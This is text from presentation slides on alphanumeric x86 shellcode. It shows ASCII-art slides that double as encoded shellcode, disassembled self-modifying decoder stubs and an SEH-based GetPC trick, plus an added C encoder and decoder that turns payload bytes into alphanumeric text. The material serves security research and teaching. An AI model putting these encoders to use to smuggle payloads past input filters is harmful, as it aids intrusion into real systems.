`' "ALEKP. ` .NN !EBOGGh `,,, `JJ .'` `
``````` oEF"'
`''` `MMMNKh 1NJH 1IIIMMN ,,. 'KA ` .sNs. .sEBs, `
.OC"
``'.' `JHEADh 1AM' 1FFLOK "'" ¦O! LO"'7K,dO" 'KI .siKOK7'
'. 7IHCI, BB! ,.`""' d, iF E P:` .H!OMDCM7` dI"' i7
`
.dKPb, ., JGKAA 1Ki ''` ., dIA !D7!G Ki d7 7K, :I,dJ'
P: ```
` .HEKCMDH, ,, lEKDO 'CI !HP'`' 'MC iC iH EL EN'. "PP7' MD, iC!``````
,MMAAGGL7 .,.`IHEM `LE`iG ,PM. A7 K7.Fl "`dD" "!.. .`,`*7ML71,
`
.ION7Ý**" ..", FCP7 !MDiI, 7OI,K!i7 AI! ,MF' `'`'"`"..`,. .sKLi:,,
NL7
`'..`.ODI' iKB"FHE' 7LE7,N'i*" .LPMDCPAEIM,
`., iDIGHELEODs,
:PM ` ` ``'.'` :DC7 !PM . ND: 'E7,i7 .GG77**"""*KKAFEKIJ, ` "OMEAIFD"'*IK,
`EL ```'''```` KB7 dF! ' dC d7 iA.AC"`.; dPF, ,. "CAACPGK, '****" .
Eh
7H; ``''````` iP7 dNI` .dJ .P7 iE7"
;i dMDJJ ".'
"GHKPKL,
. .,.` "h
`FC, ````` .iK: `
,KA" ACP l7` .," HK 'DPI7 .'''`
"LAHGGK, '"''`'` N!
*KN,. .,HC*` `.dIDN" iL7 "` `,," 7M, .LF` ````````
"EDJLIAO,, ` .PO
`"7FE*'`
`` "FE' .KI; .Kic ... *LK7"
`
``
`"NKNKNKLKNK`
``.NK; JKNAAl````
''"""''
`` KJ* `'BLHELl`````
:JA` ` "DBE7````
!Ch, `` lG7 `
"lPs..sP' `
`"**'`
45
Organic Chemistry
Single-stage

IMUL 10-equiv.

54                    PUSH ESP
58                    POP EAX
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
60                    PUSHAD
60                    PUSHAD
60                    PUSHAD
20 20                 AND BYTE PTR DS:[EAX], AH
2E E8 FF FF FF [FF]   CALL NEAR l01
l01: FF F1            PUSH ECX
EB 2E                 JMP SHORT l02
...
l02: 20 60 60         AND BYTE PTR DS:[EAX + 60], AH
60                    PUSHAD
60                    PUSHAD
20 60 38              AND BYTE PTR DS:[EAX + 38], AH
EB 20                 JMP SHORT l03
...
l03: 20 20            AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
46
Organic Chemistry
Single-stage

IMUL 10-equiv. (cont.)

20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
2E 2C 73              SUB AL, 73
61                    POPAD
61                    POPAD
EB 2C                 JMP SHORT l05
...
l04: EB 4F            JMP SHORT l07
...
l05: 20 20            AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
2C 2C                 SUB AL, 2C
61                    POPAD
33 FF                 XOR EDI, EDI
33 FE                 XOR EDI, ESI
6A 41                 PUSH +41
47
Organic Chemistry
Single-stage

IMUL 10-equiv. (cont.)

58                    POP EAX
48                    DEC EAX
F2 AE                 REPNE SCAS BYTE PTR ES:[EDI]
57                    PUSH EDI
57                    PUSH EDI
EB 20                 JMP SHORT l06
...
l06: 61               POPAD
l07: B1 48            MOV CL, 48
B6 50                 MOV DH, 50
A9 20 20 2C 73        TEST EAX, 732C2020
83 F1 47              XOR ECX, +47
54                    PUSH ESP
58                    POP EAX
75 20                 JNE l08
...
l08: 2A 36            SUB DH, BYTE PTR DS:[ESI]
46                    INC ESI
43                    INC EBX
EB 2C                 JMP SHORT l09
...
l09: 3A F1            CMP DH, CL
77 9A                 JNBE l07
20 20                 AND BYTE PTR DS:[EAX], AH
2E 27                 DAA
2C 20                 SUB AL, 20
86 EE                 XCHG DH, CH
48
Organic Chemistry
Single-stage

IMUL 10-equiv. (cont.)

l10: B6 50            MOV DH, 50
4B                    DEC EBX
54                    PUSH ESP
58                    POP EAX
B2 20                 MOV DL, 20
64 43                 INC EBX
B2 60                 MOV DL, 60
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
2A 36                 SUB DH, BYTE PTR DS:[ESI]
F2 20 20              AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
60                    PUSHAD
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
61                    POPAD
4B                    DEC EBX
46                    INC ESI
B2 20                 MOV DL, 20
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
20 20                 AND BYTE PTR DS:[EAX], AH
49
Organic Chemistry
Single-stage

IMUL 10-equiv. (cont.)

20 20                 AND BYTE PTR DS:[EAX], AH
27                    DAA
3A F1                 CMP DH, CL
77 C9                 JNBE l09
EB 09                 JMP SHORT l11
...
l11: 20 20            AND BYTE PTR DS:[EAX], AH
47                    INC EDI
C1 C9 44              ROR ECX, 44
2C 20                 SUB AL, 20
27                    DAA
2E 2C 20              SUB AL, 20
54                    PUSH ESP
58                    POP EAX
32 F1                 XOR DH, CL
86 37                 XCHG BYTE PTR DS:[EDI], DH
75 20                 JNE l12
64 74                 JE l13
...
l12: 20 60 20         AND BYTE PTR DS:[EAX + 20], AH
2E E9 C2 FE FF FF     JMP NEAR l04
l13: ...
51
ASCII Art
Julia

AAAAAAQ^j@X(F%(F)(F+(F9(F?(FV,@P_Pj_X"FW<@rQ<[tPwK$/2D9W0D9WGFu"^kDqWP2DqX2D1Wh
,[0D1WFOOu$CCLIFDHKGAC@HKGF@LHKGFALJMHKFH@HFJFDFHB@DAFCFMFHEI!!;:]:::::::];*MC
]FBC@HKODKE@BBKNAIIFFKJCCCBEBFHGGGCCBEOBKNAMFHKOLOCJJDA*:::;;+':::EAD;A;EA:E;]
'G]EAEGHMGNNJK@HACLMCGE@FIEOOEGOLIEEGF@HKEMCLHKELAM:--:^::::;GH@CMMHKDKB@@CLM]
]CCOOIIDGHKCDKI@COEJLCDGABJM@CLGAGEOGCJEDBDAL!::-=,/:/::/,GENJHKDKBD@CLM@OKG]]
]CLGIHKDKAL@CLM@CBLKIIEEOJKEGFACKOGJ]:L';!:,-':/:-GE+:KDENJMOOM@J!MOOM@IEKH@BG
]]F@KCLFFIHE@EDJMEEOOM@HEL@GDOHII]E:B':/,-'/,-EBHMGL]BD'|C'D \|J]K]|]||LFDGOA@
]]]AJKJKEGEDEBEBEBEDEBEBEFEBOOEFNDHK]D:FOLNKMIGH[l]]l'i \ " ' " ' ',//,/i]]llI
]]lllllIIIUUUUUSSUSSSSSSSSSSSWSWSWWSSWSWSSSSIIl]l: 'I.'_,,,..`_`.`. ,_ '.i'.l
"**"'`+!!+;!T]lUUSSSSSSSSSSWSSWSMWWWWSWWWSIIl]lI*lb ,,sSSS .`.M .`.`*" .v]]lll
.'-'`:-:i++::]]lUUUSSUSUWSWSSSWMMWWWSWWSSII]lIl]s, .SSSSSSb `.W` ` . \]l]l]lI
_`-`_-,,usss::]]lIIUSSUSWSSWSWMWWWWWWWSSSI]lIl]l' ::.""**""`
,. , b\VllIIIl
SWSW\Yb\\Yb\\Y '"*:!]lIUUSUSWSMMMSWWWSSlI]llMSIP '`.,,/:/:/|| d:'b:Vb]]lIIIIll
`*U\"-.'\'__, . ..`'"?!]llISWSMMMMWWSSSl]l]USUI,iIll]ili:ll]]:IiIillIIIIIIllll
'S`- .sSSP`.`.M `. s':llISWMMMMWWSSII]]lSSUIll]l]]llllllllIISIISSIIlllIIllI
`._`SSSi`.`.W.`.,Y,.]l!ISMWSMMWSSSIIl]llIIIl]]llIUSUIISSSSISIIIlll?llIISS
V:`YSSS,` ` _,oil.':!lIIS*MSMMIMISMSSIIllIIUIIUIUSUSUIUIIIIIllUIUUSSSUU
:, , `,, :,\?!ll?.:'llIIISSIWIwWSIIWMSWSIIIllllllll]l'll]llIIUIUUSSSUSU
!,/,| ?i\7ll!l!!:.]lI!ISiSSSSSSSSWWMMMSMSwSSUSUSUSSUSSUSUSSIUSSuSSUISUI
]!l]!lllIIIIIIl]!.l!dIdS*SISSSiSSWSWwSWSsMWSWSSSuSSuUUiSuSSUSSSUUIUSUIU
]l!l]ll!IiII1:1!.l,SlYIoSSSsSSSSSWWWWWWWSWSW7SWSSSSSSSSSUUUUUUIUIUUIIUI
I]l]I]IIiII11;!:,lIIdIISSSSSSSSSWSWWMMMWWMMWWWWSSsSSSSSUUUUSSUUIIIUIIII
52
Eyes Without A Face
First stage

IMUL 10

41              INC ECX
41              INC ECX
41              INC ECX
41              INC ECX
41              INC ECX
41              INC ECX
51              PUSH ECX
5E              POP ESI
6A 40           PUSH +40
58              POP EAX
28 46 25        SUB BYTE PTR DS:[ESI + 25], AL
28 46 29        SUB BYTE PTR DS:[ESI + 29], AL
28 46 2B        SUB BYTE PTR DS:[ESI + 2B], AL
28 46 39        SUB BYTE PTR DS:[ESI + 39], AL
28 46 3F        SUB BYTE PTR DS:[ESI + 3F], AL
28 46 56        SUB BYTE PTR DS:[ESI + 56], AL
2C 40           SUB AL, 40
50              PUSH EAX
5F              POP EDI
50              PUSH EAX
l1: 6A 5F       PUSH +5F
58              POP EAX
22 46 57        AND AL, BYTE PTR DS:[ESI + 57]
3C 40           CMP AL, 40
72 51           [JB l2]
3C 5B           CMP AL, 5B
74 50           [JE l3]
53
Eyes Without A Face
First stage

IMUL 10 (cont.)

77 4B           [JNBE l2]
24 2F           AND AL, 2F
32 44 39 57     XOR AL, BYTE PTR DS:[EDI + ECX + 57]
30 44 39 57     XOR BYTE PTR DS:[EDI + ECX + 57], AL
47              INC EDI
l2: 46          INC ESI
75 22           [JNE l1]
l3: ...
54
Eyes Without A Face
Second stage

IMUL 10

5E                   POP ESI
l1: 6B 44 71 57 10   IMUL EAX, DWORD PTR DS:[ESI*2 + ECX + 57], +10
32 44 71 58          XOR AL, BYTE PTR DS:[ESI*2 + ECX + 58]
32 44 31 57          XOR AL, BYTE PTR DS:[ESI + ECX + 57]
68 0D 0A 20 2C       PUSH 2C200A0D
5B                   POP EBX
30 44 31 57          XOR BYTE PTR DS:[ESI + ECX + 57], AL
46                   INC ESI
4F                   DEC EDI
4F                   DEC EDI
75 E4                JNE l1
55
ASCII Art
Blocky

WTX638WYWX4H4Pd38V34L3w0V34034Lj034LQXH41VV34LT34LZ1dDh3dDhRQXH4d4XPhAAQBhYYYYfhXBZBBBBRJfRT14L34LWHHh
28HHXTX38d39GGGGV3717RQXH4A4a1dDb3dDbABCEFGHIJKMNOABCEFGHIJKMNOABCEFGHIJKMNOABCEFGHIJKMNOABCEFGHIJKABh
HH39VTX30VXH4r4PP34tjAX0DqbFkDqjQ2Dqk0D1Hu9YhTtYP6hyUpvsojbdTxAyCPDEMZTDLbprjhbXWISM3YfPmysvndkWTooNqT
[Slide 56: ASCII-art figure drawn with alphanumeric characters; the lettering is not recoverable from the text extraction]
56
Around The Block
First stage

SEH GetPC

57               PUSH  EDI
54               PUSH  ESP
58               POP   EAX
36 33 38         XOR   EDI, DWORD PTR SS:[EAX]
57               PUSH  EDI
59               POP   ECX
57               PUSH  EDI
58               POP   EAX
34 48            XOR   AL, 48
34 50            XOR   AL, 50
64 33 38         XOR   EDI, DWORD PTR FS:[EAX]
56               PUSH  ESI
33 34 4C         XOR   ESI, DWORD PTR SS:[ECX*2 + ESP]
33 77 30         XOR   ESI, DWORD PTR DS:[EDI + 30]
56               PUSH  ESI
33 34 30         XOR   ESI, DWORD PTR DS:[ESI + EAX]
33 34 4C         XOR   ESI, DWORD PTR SS:[ECX*2 + ESP]
6A 30            PUSH  +30
33 34 4C         XOR   ESI, DWORD PTR SS:[ECX*2 + ESP]
51               PUSH  ECX
58               POP   EAX
48               DEC   EAX
34 31            XOR   AL, 31
56               PUSH  ESI
56               PUSH  ESI
33 34 4C         XOR   ESI, DWORD PTR SS:[ECX*2 + ESP]
54               PUSH  ESP
57
Around The Block
First stage

SEH GetPC (cont.)

31 64 44 68      XOR   DWORD PTR SS:[EAX*2 + ESP + 68], ESP
33 64 44 68      XOR   ESP, DWORD PTR SS:[EAX*2 + ESP + 68]
52               PUSH  EDX
51               PUSH  ECX
58               POP   EAX
48               DEC   EAX
34 64            XOR   AL, 64
34 58            XOR   AL, 58
50               PUSH  EAX
68 41 41 51 42   PUSH  42514141
68 59 59 59 59   PUSH  59595959
66 68 58 42      PUSH  4258
5A               POP   EDX
42               INC   EDX
42               INC   EDX
42               INC   EDX
42               INC   EDX
52               PUSH  EDX
4A               DEC   EDX
66 52            PUSH  DX
54               PUSH  ESP
31 34 4C         XOR   DWORD PTR SS:[ECX*2 + ESP], ESI
33 34 4C         XOR   ESI, DWORD PTR SS:[ECX*2 + ESP]
33 34 4C         XOR   ESI, DWORD PTR SS:[ECX*2 + ESP]
5A               POP   EDX
57               PUSH  EDI
48               DEC   EAX
58
Around The Block
First stage

SEH GetPC (cont.)

48               DEC   EAX
68 0D 0A 32 38   PUSH  38320A0D
48               DEC   EAX
48               DEC   EAX
58               POP   EAX
54               PUSH  ESP
58               POP   EAX
33 38            XOR   EDI, DWORD PTR DS:[EAX]
64 33 39         XOR   EDI, DWORD PTR FS:[ECX]
47               INC   EDI
47               INC   EDI
47               INC   EDI
47               INC   EDI
56               PUSH  ESI
33 37            XOR   ESI, DWORD PTR DS:[EDI]
31 37            XOR   DWORD PTR DS:[EDI], ESI
52               PUSH  EDX
51               PUSH  ECX
58               POP   EAX
48               DEC   EAX
34 41            XOR   AL, 41
34 61            XOR   AL, 61
31 64 44 62      XOR   DWORD PTR SS:[EAX*2 + ESP + 62], ESP
33 64 44 62      XOR   ESP, DWORD PTR SS:[EAX*2 + ESP + 62]
41               INC   ECX
42               INC   EDX
43               INC   EBX
59
Around The Block
First stage

SEH GetPC (cont.)

45               INC   EBP
46               INC   ESI
47               INC   EDI
48               DEC   EAX
49               DEC   ECX
4A               DEC   EDX
4B               DEC   EBX
4D               DEC   EBP
4E               DEC   ESI
4F               DEC   EDI
41               INC   ECX
42               INC   EDX
43               INC   EBX
45               INC   EBP
46               INC   ESI
47               INC   EDI
48               DEC   EAX
49               DEC   ECX
4A               DEC   EDX
4B               DEC   EBX
4D               DEC   EBP
4E               DEC   ESI
4F               DEC   EDI
41               INC   ECX
42               INC   EDX
43               INC   EBX
45               INC   EBP
46               INC   ESI
47               INC   EDI
48               DEC   EAX
49               DEC   ECX
4A               DEC   EDX
4B               DEC   EBX
4D               DEC   EBP
4E               DEC   ESI
4F               DEC   EDI
41               INC   ECX
42               INC   EDX
43               INC   EBX
45               INC   EBP
46               INC   ESI
47               INC   EDI
48               DEC   EAX
49               DEC   ECX
4A               DEC   EDX
4B               DEC   EBX
4D               DEC   EBP
4E               DEC   ESI
4F               DEC   EDI
41               INC   ECX
42               INC   EDX
43               INC   EBX
45               INC   EBP
46               INC   ESI
60
Around The Block
First stage

SEH GetPC (cont.)

47               INC   EDI
48               DEC   EAX
49               DEC   ECX
4A               DEC   EDX
4B               DEC   EBX
41               INC   ECX
42               INC   EDX
68 0D 0A 48 48   PUSH  48480A0D
33 39            XOR   EDI, DWORD PTR DS:[ECX]
61
Around The Block
First stage

SEH GetPC (simplified)

33 C0            XOR   EAX, EAX
64 8B 78 30      MOV   EDI, DWORD PTR FS:[EAX + 30]
8B 7F 18         MOV   EDI, DWORD PTR DS:[EDI + 18]
83 C7 1C         ADD   EDI, +1C
57               PUSH  EDI
57               PUSH  EDI
64 89 20         MOV   DWORD PTR FS:[EAX], ESP
B8 58 5C 59 8B   MOV   EAX, 8B595C58
AB               STOS  DWORD PTR ES:[EDI]
B8 40 0C 40 40   MOV   EAX, 40400C40
AB               STOS  DWORD PTR ES:[EDI]
66 B8 FF E0      MOV   AX, E0FF
AB               STOS  DWORD PTR ES:[EDI]
0F 0B            UD2

(The three STOS writes lay down the bytes 58 5C 59 8B 40 0C 40 40 FF E0 40 40 at the address that was pushed twice as the SEH record: POP EAX / POP ESP / POP ECX / MOV EAX, DWORD PTR [EAX + 0C] / INC EAX / INC EAX / JMP EAX, followed by two leftover 40 bytes from the earlier dword. The UD2 then raises the exception that transfers control to that stub.)
62
Around The Block
Second stage

IMUL 10

56               PUSH  ESI
54               PUSH  ESP
58               POP   EAX
33 30            XOR   ESI, DWORD PTR DS:[EAX]
56               PUSH  ESI
58               POP   EAX
48               DEC   EAX
34 72            XOR   AL, 72
34 50            XOR   AL, 50
50               PUSH  EAX
33 34 74         XOR   ESI, DWORD PTR SS:[ESI*2 + ESP]
6A 41            PUSH  +41
58               POP   EAX
30 44 71 62      XOR   BYTE PTR DS:[ESI*2 + ECX + 62], AL
l1: 46           INC   ESI
6B 44 71 6A 51   IMUL  EAX, DWORD PTR DS:[ESI*2 + ECX + 6A], +51
32 44 71 6B      XOR   AL, BYTE PTR DS:[ESI*2 + ECX + 6B]
30 44 31 48      XOR   BYTE PTR DS:[ESI + ECX + 48], AL
75 39            [JNE  l1]
63
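The four-instruction loop at l1 on the slide above is the entire second-stage decoder: each iteration multiplies a dword of the alphanumeric stream by the immediate 0x51, XORs in the following stream byte, and XORs the resulting AL into a byte already sitting at [ESI + ECX + 48]; JNE keeps looping until the patched byte becomes 0x00. The C program below is an added example, not code from the slides, that models that arithmetic in software and pairs it with the encoder a practitioner would need to produce such a stream. Its assumptions are labelled in the code: the mixed-case alphanumeric alphabet 0-9/A-Z/a-z, a known constant filler byte at every target location (in the real shellcode the target bytes are whatever is already there), and a payload that contains no 0x00 byte because that is the loop's exit condition. The memory offsets +48, +6A and +6B are dropped from the model since only the byte pairing matters; the names encode_imul, decode_imul and find_pair are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Immediate from the slide's loop: IMUL EAX, DWORD PTR [ESI*2 + ECX + 6A], +51 */
#define IMUL_IMM 0x51

/* Assumed alphabet: mixed-case alphanumeric ASCII (0-9, A-Z, a-z). */
static int alnum_ok(unsigned c)
{
    return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
           (c >= 'a' && c <= 'z');
}

/* One iteration's contribution to AL.  IMUL multiplies a whole dword, but only
 * AL is used afterwards and the low byte of a product depends only on the low
 * byte of the multiplicand, so the dword is modelled by its first byte a;
 * b is the byte that follows it in the stream. */
static uint8_t imul_term(uint8_t a, uint8_t b)
{
    return (uint8_t)(((a * IMUL_IMM) & 0xFF) ^ b);
}

/* Choose alphanumeric a, b with imul_term(a, b) == want.  Once a is fixed, b is
 * forced (b = (a*0x51) ^ want), so this is a 62-entry scan.  1 = found. */
static int find_pair(uint8_t want, uint8_t *a_out, uint8_t *b_out)
{
    for (unsigned a = '0'; a <= 'z'; a++) {
        if (!alnum_ok(a)) continue;
        unsigned b = ((a * IMUL_IMM) & 0xFF) ^ want;
        if (alnum_ok(b)) { *a_out = (uint8_t)a; *b_out = (uint8_t)b; return 1; }
    }
    return 0;
}

/* Encoder.  The loop XORs AL into a byte already in memory, so each pair must
 * yield payload[i] ^ filler, where filler is the byte assumed to sit at the
 * target beforehand.  JNE exits when the patched byte becomes 0x00, so the
 * payload may not contain 0x00 and a 0x00 terminator is appended.
 * Writes 2*(n+1) bytes to out; returns that length, or 0 on failure. */
static size_t encode_imul(const uint8_t *payload, size_t n, uint8_t filler, uint8_t *out)
{
    for (size_t i = 0; i < n; i++) {
        if (payload[i] == 0x00) return 0;            /* would end the loop early */
        if (!find_pair(payload[i] ^ filler, &out[2*i], &out[2*i+1])) return 0;
    }
    if (!find_pair(0x00 ^ filler, &out[2*n], &out[2*n+1])) return 0;   /* terminator */
    return 2 * (n + 1);
}

/* Decoder: software model of the slide's loop.
 *   l1: INC ESI / IMUL EAX,[ESI*2+ECX+6A],51 / XOR AL,[ESI*2+ECX+6B]
 *       XOR [ESI+ECX+48],AL  (sets ZF from the result) / JNE l1
 * target[] stands in for the bytes at ECX+48+ESI, pre-filled with filler.
 * Returns the number of bytes decoded before the 0x00 terminator. */
static size_t decode_imul(const uint8_t *enc, uint8_t *target, size_t cap, uint8_t filler)
{
    size_t i = 0;
    while (i < cap) {
        target[i] = filler;
        target[i] ^= imul_term(enc[2*i], enc[2*i+1]);
        if (target[i] == 0x00) break;                /* JNE falls through */
        i++;
    }
    return i;
}

/* Constructed sample payload (not from the slides): non-alphanumeric bytes,
 * some with the high bit set, none equal to 0x00. */
static const uint8_t sample_payload[] = { 0x90, 0xCC, 0xFF, 0x01, 0xE8, 0x7F };

/* 1 if decode(encode(p)) == p and every encoded byte is alphanumeric. */
static int roundtrip_ok(const uint8_t *p, size_t n, uint8_t filler)
{
    uint8_t enc[64], dec[32];
    if (2 * (n + 1) > sizeof enc || n + 1 > sizeof dec) return 0;
    size_t elen = encode_imul(p, n, filler, enc);
    if (elen == 0) return 0;
    for (size_t i = 0; i < elen; i++)
        if (!alnum_ok(enc[i])) return 0;
    if (decode_imul(enc, dec, sizeof dec, filler) != n) return 0;
    return memcmp(dec, p, n) == 0;
}

/* 1 if every delta byte 0x00..0xFF has an alphanumeric pair for this
 * multiplier, i.e. the encoder cannot fail on a zero-free payload. */
static int all_deltas_encodable(void)
{
    uint8_t a, b;
    for (unsigned d = 0; d < 256; d++)
        if (!find_pair((uint8_t)d, &a, &b)) return 0;
    return 1;
}

int main(void)
{
    uint8_t enc[64];
    size_t n = encode_imul(sample_payload, sizeof sample_payload, 'A', enc);
    printf("encoded (%zu bytes): %.*s\n", n, (int)n, enc);
    printf("round trip: %s\n", roundtrip_ok(sample_payload, sizeof sample_payload, 'A') ? "ok" : "FAIL");
    printf("all 256 deltas encodable: %s\n", all_deltas_encodable() ? "yes" : "no");
    return 0;
}
```

Two properties worth noticing: because 0x51 is odd, multiplication by it is a bijection on bytes, and because 0x51 is 1 mod 16 it leaves the low nibble of a alone and only scrambles the high nibble, which is what lets 62 x 62 alphanumeric pairs reach all 256 deltas (all_deltas_encodable checks this exhaustively rather than assuming it). The JNE exit condition is the practical caveat: a payload with an embedded 0x00 truncates at that byte, so the encoder refuses it.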
Thank you
Check me out: http://pferrie.tripod.com
Questions?
64